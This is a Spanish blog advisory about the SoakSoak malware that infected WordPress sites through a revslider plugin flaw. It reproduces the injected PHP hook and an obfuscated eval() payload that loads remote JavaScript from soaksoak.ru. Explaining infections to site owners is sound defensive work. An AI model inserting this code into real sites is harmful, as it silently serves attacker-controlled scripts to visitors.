SoakSoak WordPress

Acabamos de despertarnos y tenemos la noticia de que un nuevo malware “SoakSoak” ha infectado a miles de wordpress en todo el mundo.

Según datos obtenidos de la plataforma Sucuri están hay más de 100.000 WordPress con un malware conocido como SoakSoak, según datos recogidos de esta plataforma el malware viene debido a una vulnerabilidad en el modulo revslider (Slider Revolution Premium WordPress Plugin) con el que referente a un fallo de seguridad se pueden descargar cualquier fichero de WordPress, pudiéndose descargar el fichero wp-config.php y así tener acceso a la base de datos donde esta instalado nuestro cms (más detalles aquí).

Muchos usuarios se dan cuenta cuando al acceder a su web salta un aviso de Google de que la web está infectada.

SoakSoak-RU-Blacklisted

Lo que realiza el malware de SoakSoak es que accede al fichero wp-includes/template-loader.php y lo modifica incluyendo lo siguiente:

<?php
function FuncQueueObject()
{
  wp_enqueue_script("swfobject");
}
add_action("wp_enqueue_scripts", 'FuncQueueObject');

Esto provoca que se añada el siguiente fichero wp-includes/js/swobject.js con un contenido codificado

eval(decodeURIComponent('%28%0D%0A%66%75%6E%63%74%69%6F%6E%28%29%0D%0A%7B%0D%0A%09%2F%2F%76%61%72%20%75%61%20%3D%20%6E%61%76%69%67%61%74%6F%72%2E%75%73%65%72%41%67%65%6E%74%2E%74%6F%4C%6F%77%65%72%43%61%73%65%28%29%3B%0D%0A%09%2F%2F%69%66%20%28%75%61%2E%69%6E%64%65%78%4F%66%28%27%63%68%72%6F%6D%65%27%29%20%21%3D%20%2D%31%29%20%72%65%74%75%72%6E%3B%0D%0A%09%76%61%72%20%68%65%61%64%3D%64%6F%63%75%6D%65%6E%74%2E%67%65%74%45%6C%65%6D%65%6E%74%73%42%79%54%61%67%4E%61%6D%65%28%27%68%65%61%64%27%29%5B%30%5D%3B%0D%0A%09%76%61%72%20%73%63%72%69%70%74%3D%64%6F%63%75%6D%65%6E%74%2E%63%72%65%61%74%65%45%6C%65%6D%65%6E%74%28%27%73%63%72%69%70%74%27%29%3B%0D%0A%09%73%63%72%69%70%74%2E%74%79%70%65%3D%27%74%65%78%74%2F%6A%61%76%61%73%63%72%69%70%74%27%3B%0D%0A%09%73%63%72%69%70%74%2E%73%72%63%3D%27%68%74%74%70%3A%2F%2F%73%6F%61%6B%73%6F%61%6B%2E%72%75%2F%78%74%65%61%73%2F%63%6F%64%65%27%3B%0D%0A%09%73%63%72%69%70%74%2E%69%64%3D%27%78%78%79%79%7A%7A%5F%70%65%74%75%73%68%6F%6B%27%3B%0D%0A%09%68%65%61%64%2E%61%70%70%65%6E%64%43%68%69%6C%64%28%73%63%72%69%70%74%29%3B%0D%0A%7D%28%29%0D%0A%29%3B'));

Este malware cuando decodifica carga un malware javascript del dominio SoakSoack.ru, específicamente este archivo: hXXp://soaksoak.ru/xteas/code

Si usted cree que está infectado, puede utilizar el escáner gratuito SiteCheck.

SoakSoak

Si ya esta infectado póngase en contacto con nuestro departamento de soporte para que desinfecten la web.

Dejar respuesta

  He leído y acepto la política de privacidad

Información básica de protección sobre datos personales